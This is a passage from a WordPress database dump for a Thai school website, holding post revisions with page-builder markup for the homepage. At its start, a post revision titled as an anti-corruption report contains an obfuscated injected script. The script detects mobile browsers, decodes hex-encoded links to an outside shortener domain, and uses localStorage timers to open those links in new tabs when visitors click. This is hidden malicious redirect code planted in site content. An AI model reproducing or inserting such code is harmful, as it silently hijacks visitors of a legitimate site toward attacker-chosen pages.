)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานการดำเนินการป้องกันการทุจริตประจำปี','','inherit','closed','closed','','1016-revision-v1','','','2024-08-21 09:28:44','2024-08-21 02:28:44','',1016,'http://pakhaeng.ssk.in.th/?p=1018',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1019,1,'2024-08-21 09:29:57','2024-08-21 02:29:57','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 